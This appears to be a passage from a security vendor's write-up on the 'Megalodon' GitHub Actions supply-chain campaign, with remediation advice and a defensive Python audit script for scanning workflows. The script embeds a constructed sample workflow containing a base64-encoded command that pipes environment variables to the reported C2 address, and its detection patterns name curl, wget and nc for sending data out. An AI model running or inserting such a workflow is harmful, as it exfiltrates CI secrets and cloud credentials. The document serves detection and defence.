Megalodon: Mass GitHub Repo Backdooring via CI Workflows
Critical supply-chain incident: mass GitHub repository backdooring via injected CI workflows.
In the Megalodon campaign, an attacker pushed 5,718 malicious commits across 5,561 GitHub repos in six hours, forging author identities such as `build-bot` to inject GitHub Actions workflows. The mass variant (`SysDiag`) triggers on every push and pull request, while the targeted variant (`Optimize-Build`) uses `workflow_dispatch` for on-demand exfiltration of secrets, including AWS/GCP/Azure credentials, OIDC tokens, and SSH keys, to a C2 server at 216.126.225.129:8443. The attack spread via compromised Tiledesk npm package versions 2.18.6–2.18.12; the compromise originated in the legitimate maintainer's GitHub repo, not the npm account.
Audit all GitHub Actions workflow permissions (especially `id-token: write`), pin CI dependencies to immutable versions, and review recent workflow commits from unfamiliar author identities to detect injections like Megalodon.
For a platform/cloud engineer managing CI/CD and open-source dependencies, this attack demonstrates a critical supply chain vector: an attacker with write access to a GitHub repo injects malicious workflows that exfiltrate cloud credentials and OIDC tokens, enabling impersonation of the repository's cloud identity.
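The indicators named above (an `id-token: write` grant, a `workflow_dispatch` trigger, a base64-decoded bash payload, unpinned actions, and the reported C2 address) can be checked statically before a workflow ever runs. The following audit script is an added example, not SafeDep's tooling or the campaign's own code; it treats workflow YAML as text so it needs no third-party parser, decodes any long base64 literal it finds and scans the decoded text as well, and flags the forged author names the write-up lists. The two workflow samples inside it are constructed for a self-contained run; the "suspicious" one imitates the described indicators and is not the real Megalodon workflow.

```python
"""Static audit of GitHub Actions workflow files for Megalodon-style indicators.

Added example, not SafeDep's tooling. Workflow YAML is scanned as text, so no
third-party YAML parser is needed. Indicators come from the campaign write-up:
id-token: write, workflow_dispatch, base64-decoded shell payloads, toJSON(secrets)
dumps, URLs to bare IPs, unpinned actions, and the reported C2 address; base64
literals are decoded and scanned too, since the payloads were base64-encoded.
"""
import base64
import binascii
import re
from pathlib import Path

MEGALODON_C2 = "216.126.225.129"  # C2 address reported in the write-up
FORGED_AUTHORS = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}  # forged commit authors

RE_ID_TOKEN_WRITE = re.compile(r"^\s*id-token:\s*write\b", re.M)
RE_DISPATCH = re.compile(r"^\s*workflow_dispatch\s*:", re.M)
RE_B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
RE_SECRETS_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)")
RE_RAW_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")
RE_USES = re.compile(r"^\s*-?\s*uses:\s*([^\s@]+)@(\S+)", re.M)
RE_SHA = re.compile(r"[0-9a-f]{40}")
RE_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
RE_ENV_TO_NET = re.compile(r"\b(?:printenv|env)\b.*\|\s*.*\b(?:curl|wget|nc)\b")


def decode_blobs(text: str) -> list[str]:
    """Best-effort decode of long base64-looking literals into printable text."""
    decoded = []
    for m in RE_B64_BLOB.finditer(text):
        if RE_SHA.fullmatch(m.group(0)):
            continue  # a 40-hex commit pin, not a payload
        try:
            s = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in s):
            decoded.append(s)
    return decoded


def audit_workflow(text: str) -> list[str]:
    """Return finding codes for one workflow file's contents (empty list = clean)."""
    findings = []
    if RE_ID_TOKEN_WRITE.search(text):
        findings.append("id_token_write")          # OIDC token can be minted
    if RE_DISPATCH.search(text):
        findings.append("workflow_dispatch")       # runnable on demand by the attacker
    if RE_B64_DECODE.search(text):
        findings.append("base64_decode")           # obfuscated shell in a run step
    if RE_SECRETS_DUMP.search(text):
        findings.append("secrets_dump")            # whole secrets context serialised
    for action, ref in RE_USES.findall(text):
        if not RE_SHA.fullmatch(ref):              # tags and branches are mutable
            findings.append(f"unpinned_action:{action}@{ref}")
    blobs = decode_blobs(text)
    for haystack in [text, *blobs]:                # raw file plus decoded payloads
        for ip in RE_RAW_IP_URL.findall(haystack):
            findings.append(f"raw_ip_url:{ip}")
        if MEGALODON_C2 in haystack:
            findings.append("megalodon_c2")
    for blob in blobs:
        if RE_ENV_TO_NET.search(blob):
            findings.append("env_exfil_in_decoded_payload")
    return findings


def audit_repo(repo: Path) -> dict[str, list[str]]:
    """Audit every workflow under .github/workflows of a checked-out repo."""
    results = {}
    for path in sorted((repo / ".github" / "workflows").glob("*.y*ml")):
        findings = audit_workflow(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            results[str(path)] = findings
    return results


def is_forged_author(author: str) -> bool:
    """Flag the throwaway author names the campaign used on its commits."""
    return author.strip().lower() in FORGED_AUTHORS


# Constructed samples (not the real Megalodon workflow); the payload is a generic
# env-to-HTTP one-liner built only to exercise the decoded-blob checks.
_PAYLOAD = base64.b64encode(
    b"printenv | curl -s --data-binary @- http://216.126.225.129:8443/\n"
).decode()
SUSPICIOUS_WORKFLOW = f"""name: SysDiag
on: [push, pull_request]
permissions:
  id-token: write
  contents: read
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo {_PAYLOAD} | base64 -d | bash
"""
BENIGN_WORKFLOW = """name: CI
on: [push]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0000000000000000000000000000000000000000  # placeholder SHA pin
      - run: make test
"""

if __name__ == "__main__":
    for name, wf in [("suspicious", SUSPICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)]:
        print(name, audit_workflow(wf) or "clean")
```

Run `audit_repo(Path("."))` from a checkout to get a per-file finding list; pair it with `git log --format=%an -- .github/workflows` piped through `is_forged_author` to catch the forged `build-bot`-style identities. The regex approach is deliberately permissive: `workflow_dispatch` and `id-token: write` are legitimate in many repos, so treat the codes as triage signals to review together rather than as verdicts.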
SafeDep Team • May 21, 2026 (Malware)

TL;DR

On May 18, 2026, an automated campaign codenamed megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in a six-hour window. Using throwaway accounts and forged author identities (`build-bot`, `auto-ci`, `ci-bot`, `pipeline-bot`), the attacker injected GitHub Actions workflows containing base64-encoded bash payloads that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets to a C2 server at